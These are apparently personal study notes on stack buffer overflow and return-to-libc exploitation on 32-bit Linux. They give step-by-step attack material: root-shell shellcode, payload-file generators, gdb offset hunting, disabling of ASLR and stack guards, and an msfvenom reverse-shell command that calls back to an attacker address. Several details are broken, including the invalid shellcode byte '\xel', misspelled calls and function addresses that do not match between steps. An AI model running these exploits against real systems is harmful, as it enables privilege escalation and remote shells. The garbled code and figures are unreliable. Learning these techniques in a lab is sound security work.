# Buffer Overflow and Return2Libc

![title](Layout.png)

## The memory layout of a C program:
* __Text Segment__: read-only executable codes 
* __Data Segment__: stores static/global variables initialized by the programmer. 
* __BSS Segment__: uninitialized static/global variables. Normally all zeros, since uninitialized variables to zeros according to compiler.
* __Heap__: space for dynamic memory allocation. _malloc, calloc, realloc, free_.etc. Heap grows from bottom to top (from lower memory address to higher)
* __Stack__: space for local variables inside functions and data related to function calls. Stack grows top to bottom (from higher memory address to lower memory address).


![stackmemory](Stack.png)

```c
void func(int a, int b)
{
    int x,y;
    x = a + b;
    y = a - b; 
}
```
Assembly code for it:
```
pushl    %ebp
movl     %esp, %ebp
subl     $16, %esp
movl     12(%ebp), %eax
movl     8(%ebp), %edx
addl     %edx, %eax
movl     %eax, -8(%ebp)
movl     12(%ebp), %eax 
movl     8(%ebp), %edx
movl     %edx, %ecx
subl     %eax, %ecx 
movl     %ecx, %eax 
movl     %eax, -4(%ebp)
movl     %ebp, %esp 
popl     %ebp 
```

## Stack Frame Mechanisms 
whenever a function call is invoked, stack frame is allocated on memory. A stack frame contains: 
* Argument: values passed into the function 
* Return Address: stores the address the function returns to after it returns. 
* Previous Frame Pointer: the address of the callee of the function.
* Local variables: variables allocated inside the scope of the function and garbage collected when function returns.


__Frame Pointer__ is introduced in CPU to point to a fixed location in the stack frame, so the address of each argument and local variable on the stack frame can be calculated using this register and an offset. Frame Pointer can be changed during runtime, whereas the offset can be determined at compile time. 
in x86 architecture, __frame pointer always point to the address of previous frame pointer__. in 32-bit architecture, return address and frame poitner both occupy 4 bytes. The detail can be seen directly from the assembly instructions 

In function call scenario, frame pointers are used for each function to remember its caller's adress. Before entering the callee function, the caller's frame pointer value is stored in the __previous frame pointer__ field on the stack. When callee returns, the value in this field will be used to set the frame pointer register, making it point to the caller's stack frame again. 

## Stack Buffer Overflow 
Unlike Java, which can automatically detect the problem when a buffer is over-run, C and C++ are not able to detect it. 
A simple C program that overflows the buffer is simply using memory copying functions.

```c
#include <string.h>
void foo(char *str)
{
    char buffer[12];
    strcpy(buffer, str);
}

int main()
{
    char *str = "this is definitely longer than 12";
    foo(str);
    return 1;
}
```

The stackframe layout for the program is as follows: 
![layout](stack2.png)

Since the buffer's allocated size is 12, but the input string is more than 12 bytes, it will rewrite some of the previous frame pointer in a machine without stack protection activated. When the return address portion is rewritten, several things can happen:
* The new address could be undefined and program crashes
* The new address is protected by kernel and eception raised, program will crash
* The new address point to data instead of instruction, program crashes
* The new address point to instructions, but the program logic will inevitably change.

__Exploitation__ for buffer overflow would first be an attempt to modify the return address (previous frame pointer). This is an example of __arbitrary code execution__. One way is to return the function call to the memory address of a malicious file that contains shellcode exploits. The shell code can be injected into memory as a part of the memory copy operations in the C code. 
```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

int foo(char *str) 
{
    char buffer[100];
    strcpy(buffer, str);
    return 1;
}

int main(int argc, char** argv)
{
    char str[400];
    FILE *badfile;
    badfile = fopen("badfile", "r");
    fread(str, sizeof(char), 300, badfile);
    foo(str);
    printf("Returned properly\n");
    return 1;
}

```

The "bad code" chunk of the code can be stored at the top of the stackframe (with offest calculated) and the return address can be rewritten to point to the beginning of the bad code. This is all done in the "bad file". This is the most basic form of buffer overflow. The real world examples are much more complicated. 
![badfile](badfile_insert.png)


### Experiments on Ubuntu 16.04 (Local Exploit)
#### Step1: Disable Address Randomization 
```
sudo sysctl -w kernel.randomize_va_space=0
```
#### Step2: Compile the vulnerable Program
the goal is to exploit buffer overflow vulnerability in a _Set-UID_ root program, which is executed at root privilege even by a normal user. THe commands are:
```
gcc -o stack -z execstack -fno-stack-protector stack.c 
sudo chown root stack
sudo chmod 4755 stack
```

The First command compiles the stack.c, and at the same time disables two countermeasures against stack overflow.
* -z execstack: non-execution stack is disabled, the countermeasure is to make the stack non-executable, which prevents injected malicious code from getting executed. (The countermeasure is return-to-libc attack).
* -fno-stack-protector: Stack Guard is disabled. The countermeasure detects stack overflow and is built-in in gcc compilers. 

#### Step 3: Conducting Exploit:
* Guess space should be small for the address of malicious code, since most programs don't have very deep stacks. Moreoever, addresses should introduce no conflicts since they are virtual memories and are mapped into different physical locations. 
* Without randomization, we can guess the fixed starting address of a stack, by printing out the address of a variable by dereferencing it and printing out with hex. 
```c
printf("address is 0x%x \n", (unsigned int) &x);
```

* Another way to better guess is by creating many entry points for injected code. A way to do it is using __NOP sled__, as illustrated by the picture 
![nop](NOP.png)

#### Or better, simply finding the exact location
if one can get a copy of the victim program and do some investigation (i.e. after getting a reverse shell), one can calculate the address. Analyze using gdb:
```
gcc -z execstack -fno-stack-protector -g -o stack_dbg stack.c
touch badfile
gdb stack_dbg 
(gdb) b foo
(gdb) run 
```
After breakpoint in the target function foo(), we can print out the value of ebp register: 
```
(gdb) p $ebp     // assume gives 0xbffff188
(gdb) p &buffer   // assume gives 0xbffff11c 
(gdb) p 0xbffff188 - 0xbffff11c
(gdb) quit 
```

The frame pointer has address 0xbffff188, so that return address is \$ebp + 4. By the NOP sled figure, we can set the value in return address as \$ebp + 8. The offset is 108 from the above calculation, this means that distance between buffer and the ebp register is 108 bytes. We therefore need to pad the first 112 bytes of the buffer. 

#### Step 4: Constructing the Input File 

* The first 112 bytes of the buffer should be padding characters, for simplicity, assume that they are set as NOP, or /x90. 
* Then the next 4 bytes should be the beginning of the NOP sled, which is 0xbffff188 + 8. 
* Then the next chunk of codes will be a combination of NOP sled and the malicious shellcode. The shellcode is placed at the end of the buffer. 
The sample code is shown below

```c
#include <stdlib.h>
#include <stdio.h>
#include <string.h>

char shellcode[] = 
    "\x31\xc0"       // xorl %eax, %eax 
    "\x50"           // pushl %eax 
    "\x68""//sh"     // pushl 0x68732f2f 
    "\x68""//bin"    // pushl 0x6e69622f 
    "\x89\xe3"       // movl %esp, %ebx 
    "\x50"           // pushl %eax 
    "\x53"           // pushl %ebx 
    "\x89\xel"       // movl %esp, ecx 
    "\x99"           // cdq 
    "\xb0\x0b"       // movb $0x0b, $al 
    "\xcd\x80"       // int $0x80
;


void main(int argc, char **argv) {
    char buffer[200];
    FILE *badfile;
    memset(&buffer, 0x90, 200);
    *((long*) (buffer + 112)) = 0xbffff188 + 0x80; 
    memcpy(buffer + sizeof(buffer) - sizeof(shellcode), shellcode, sizeof(shellcode)); 
    badfile = fopen("./badfile", "w");
    fwrite(buffer, 200, 1, badfile);
    fclose(badfile);
}    

```

The value stored inside the return address is not 0xbffff188 + 8, instead, it is set to be 0xbffff188 + 0x80. This is because while we got the offset of 8 in gdb, the actual address could be bigger, since gdb would push some data onto the stack at beginning. Also, the content of badfile __should not have bad characters such as 0x00__, which could truncate the whole file. This includes the address computed after 0xbffff188 + nnn. For example if nnn = 0x78, the result 0xbffff200 will have 0x00, and this will truncate the whole buffer. 

#### Step 6: Run the exploit
If we compile the code above and generate the badfile, then, if we run the _stack_ executable again, we can get a root shell. 

## Writing Shellcode 

The core part to get a shell is to use the _execve()_ system call to execute "/bin/sh". This means we need to set four registers: 
* %eax: must contain 11, which is the system call number for execve().
* %ebx: must contain the address of the command string ("/bin/sh"). 
* %ecx: must contain the address of the argument array; in our case, the first element of the array points "/bin/sh" string, while the second element is 0 (which marks end of array). 
* %edx: must contain the address of the environment variables that we want to pass to the new program. We can set it to zero, as no need to input environment variables. 
To achieve these, we need to know the address of the "/bin/sh" string. and have to worry about zeros too. <br>
A shortcut is simply to use the metasploit framework's __msfvenom__ module. 

### Example Shellcode explanation:
```c
    "\x31\xc0"       // xorl %eax, %eax 
    "\x50"           // pushl %eax 
    "\x68""//sh"     // pushl 0x68732f2f 
    "\x68""//bin"    // pushl 0x6e69622f 
    "\x89\xe3"       // movl %esp, %ebx 
    "\x50"           // pushl %eax 
    "\x53"           // pushl %ebx 
    "\x89\xel"       // movl %esp, ecx 
    "\x99"           // cdq 
    "\xb0\x0b"       // movb $0x0b, $al 
    "\xcd\x80"       // int $0x80

```

#### Step1: Finding the address of "/bin/bash" string and set %ebx 
we first push the string to stack, since we can only push four bytes at a time, we need to divide the string into 3 pieces, 4 bytes each, and last piece first (since stack grows from high to low address).
* xorl %eax %eax : using XOR operation on eax register can set it to zero, without introducing any zeros in code.
* pushl %eax: push a zero into the stack. This zero marks the end of the "/bin/sh" string. 
* pushl \$0x68732f2f: push "//sh" into the stack. double slash is used because 4 bytes is required, and double slash is treated the same as single slash by execve(). 
* pushl \$0x6e69622f: push "/bin" into the stack. Now "/bin/sh" has all been pushed on the stack, and ebp now points to the beginning of the string. 
* movl %esp, %ebx: Move %esp to %ebx. This way we save the string's address in register ebx. 

#### Step2: Finding address of the name[] array and set %ecx 

The name[] array should contain two elements, address of "/bin/sh" for name[0] and 0 for name[1]. 
* pushl %eax : construct the second item of the name array. Which is simply zero. 
* pushl %ebx : ebx contains address of "/bin/sh". push it and the entire name array is constructed. 
* movl %esp, %ecx : esp now points to beginning of name array, so we save the address to register ecx. 

#### Step 3: Setting %edx to zero:
* cdq : simply copies sign bit (0) of value in %eax into every bit position in %edx, setting it to zero. This instruction is only 1 byte long. 
* xorl %edx, %edx : can also work, but takes 4 bytes of memory. 

#### Step 4: Invoking the exeve() system call
* movb \$0x0b, %al : sets al (lower 8 bits of %eax register) to 11 (the opcode for the execve() system call). Notice that %eax is zero before the setting. So now %eax stores simply 11. 
* int \$0x80: executes the system call. _int_ instruction triggers interrupt to kernel mode, and opcode 0x80 makes system call. 

## Another way: Kali Demo 

### Remote Buffer Overflow
The attack against a remote service could begin with _fuzzing_: send out strings with incremental length to the target port, and expect crash. 
* use the __pattern_create.rb__ in Kali Linux to send out unique strings
* If able to capture the %eip register's value in the debugger, search the pattern in __pattern_offset.rb__ in Kali Linux and find the offset.
* Observe the value of register esp and try to manipulate its value (In this case, the Windows exploit example has esp directly pointing to the buffer location, which should be a great location for shellcode).
* When generating shell code in __msfvenom__, rule out the bad character sets. 
* Return address under __address randomization__ would break the general buffer overflow introduced in the previous section. The way around is find the esp register (return address) at the event of crash. We can locate the register by looking for __reliable, accessible__ memory location that contains the instruction 
 ```
 jmp %esp 
 ```
 Reliable and accessible means that there is no memory protection such as DEP and ASLR present, and memory range does not contain bad characters. 
 * The search for the instruction is accomplished via the __!mona.py__ script in the Immunity Debugger. 
     * This process include to first find the hex representation of the assembly instruction, via __nasm_shell.rb__ in Kali Linux. 
 * ``` !mona find -s "\xff\xe4" -m slmfc.dll ``` as an example 
 * Put the address found from mona.py right after the padding (up until register %eip). 
 * Pad the rest of the with some NOP sled (i.e. "\x90" * 8)
 * Pad the rest of buffer with shellcode,generated from ``` msfvenom -p windows/shell_reverse_tcp LHOST=10.0.0.4 LPORT=443 -f c -e x86/shikata_ga_nai -b "\x00\x0a\x0d" 

### Stack Guard Bypass 
The first example serves to deal with the most basic stack overflow, where there is no countermeasure implemented in compiler or hardware. The kernel address randomization's countermeasure is explained in the Kali Linux Exploit case. The case of non-executable stack is illustrated in the __Return-to-libc Attack__ below. This section dedicates to bypassing another mechanism introduced by the gcc compiler, called __stack gaurd__. <br>
#### Stack Guard 
This countermeasure observes the fact that 
* Any stack overflow attack has to modify the return address
* All the memory between return address and the buffer will be overwritten. 
Therefore, the compiler place some non-predictable value between the buffer and the return address. Before returning the function, it checks whether the value is modified or not. If it is modified, it is likely that return address is modified, and the compiler will warn the user of a _stack smash_.
* The value of the __guard__ should not be stored in the stack, or otherwise it is overwritten too.
* It can be stored in heap, BSS, data segment. (i.e. an uninitialized global variable is stored in BSS segment) 
Example following shows the idea of stack guard:
```c
//unintialized, value given at runtime by random number generator.
int secret;

void foo(char *str) {
    int guard;
    gaurd = secret; 
    char buffer[12];
    strcpy(buffer, str);
    if (guard==secret)
        return;
    else 
        exit(1); 
}

```
The gcc compiler have built-in stack guard, so if the -fno-stack-protector -z is not enabled, it is automatically on. We can examine the assembly code for a program to find out the stack guard. Sample __canary code__ is: 
```
movl     %gs:20, %eax
movl     %eax, -12(%ebp)
xorl     %eax, %eax 
...
movl     -12(%ebp), %eax 
xorl     %gs:20,  %eax 
je       .L2 
call     _stack_chk_fail 
```
Key property of the stack canary should be that: 
* it must be random value
* it must be stored from outside of the stack 

#### Bypass 

## The Return-to-libc Attack

This type of attack aims at the __non-executable stack__ countermeasure. It aims at using the codes already in memory when the injected code cannot be executed. The best target is the _libc_ library, one that is used alot and loaded into memory by OS everytime. <br>
One example is to use the _system()_ call from the clib, and pass "/bin/sh" to it. <br>
Using the same vulnerable sample C code, but compile it with 
```
gcc -fno-stack-protector -z nonexeccstack -o stack stack.c
sudo sysctl -w kernel.randomize_va_space=0 
sudo chown root stack
sudo chmod 4755 stack
```
These two commands make the program non-stack executable and turns off address randomization (whose bypass method is introduced in previous Kali example). Also the program is SETUID program, allowing us to exploit and get a root shell

### Find the address of system(): 
First, debug the program with gdb, and after run it, check the loaded system call's memory address:
```
touch badfile 
gdb stack 
(gdb) run 
(gdb) p system
$1 = {<text variable, no debug info>} 0xb7e5f430 <system>
(gdb) p exit
$2 = {<text variable, no debug info>} 0xb7e52fb0 <exit> 
(gdb) quit
``` 
### Find address of "\bin\sh" string:
We have previously use the stack to place the string. Now we can also use the environment variable. 
```c
//envaddr.c 
#include <stdio.h>
int main() {
    char *shell = (char *)gentenv("MYSHELL");
    if (shell) {
        printf(" Value: %s\n", shell);
        printf(" Address: %x\n", (unsigned int) shell);
    }
    return 1; 
}
```
with the following command 
```
gcc envaddr.c -o env55
export MYSHELL="/bin/sh"
./env55
```
This works because the environment variable is passed into the child process of the shell program (our vulnerable program), loaded directly into its virtual memory. The environment variable's memory location is sensitive to the filename. 

### Prepare for the argument:
Before the vulnerable program jump to the system() function, we need to place the argument on the stack ourselves. We need to know the location for the ebp register when we invoke the system() function call.The location should be ebp+8 in our case. 
![ebp](ebp.png)

Without address randomization, we need to predict the location for register ebp after the jump into the system() function. To do this, we need to understand __function prologue__ and __function epilogue__. 
#### Function Prologue 
In assembly, function prlogue is code at the beginning of a function, used to prepare the stack and registers for the function. On IA32, it normally consists of: 
```
pushl %ebp                // saves caller function's address 
movl  %esp, %ebp          // frame pointer to current location
subl  $N, %esp            // allocate space for local variables 
```

#### Function Epilogue 
The code at the end of the function call. It is used to restore the stack nd registers back to the state before the function is invoked. 
```
movl %ebp, %esp       // release stack memory 
popl %ebp             // assign previous pointer to ebp
ret                   // free return address, jump to to it
```
Note that the return address is 4 bytes above the stack frame pointer. x86 has _leave_ and _enter_ for function epilogue and function prologue.

Now the meatly part: we need to find where to place the argument for the system() by first inspecting the function epilogue of the vulnerable program and the function prologue of the system() function call. To make the vulnerable function return to system() function call in clib, we need to trace register $esp for this task <br>.
Once the vulnerable function returns, stack space is recycled, ebp pointer is recycled until the new function call makes it point to esp. Once the program jumps into system(), the function prologue will be executed, ebp will have the esp value, and esp will move for four bytes below. The argument should be placed 8 bytes above the ebp register (or 4 bytes above the esp register). The place marked by ebp + 4 should be treated as return address of the system() call, which in our case could be an exit() function. 

#### The Malicious Input
__find the offset between buffer and the ebp register__: 
```
gcc -fno-stack-protector -z nonexecstack -g -o stack_dbg stackc.c
touch badfile 
gdb stack_dbg 
(gdb) b vul_func 
(gdb) run 
(gdb) p &buffer
(gdb) p $ebp 
(gdb) p 0xbffff208 - 0xbffff1ce    // 58 
```
The offset between buffer start and the ebp register is 58 bytes, therefore: 
* address of the system() function should be in offset of 62 bytes 
* address of the exit() function should be in offset of 66 bytes
* address of the string "/bin/sh" should be in offset of 70 bytes
These requirements give us the new c code:
```c
#include <stdio.h>
#include <string.h>
int main(int argc, char** argv) {
    char buf[200];
    FILE *badfile;
    memset(buf, 0xaa, 200); 
    *(long *) &buf[70] = 0xbffffe8c; // address of "/bin/sh" 
    *(long *) &buf[66] = 0xb7e52f60; // address of exit() 
    *(long *) &buf[62] = 0xbfe5f430; // address of system() 
    badfile = fopen("./badfile", "w");
    fwrite(buf, sizeof(buf), 1, badfile);
    fclose(badfile); 
}
```
We run the same vulnerable program as before and we should get a root shell (only with the executable name as the same length as _env55_ we compiled earlier, the ennvironment variable file). 
```
gcc ret_to_libc_exploit.c -o exploit 
./exploit 
./stack
```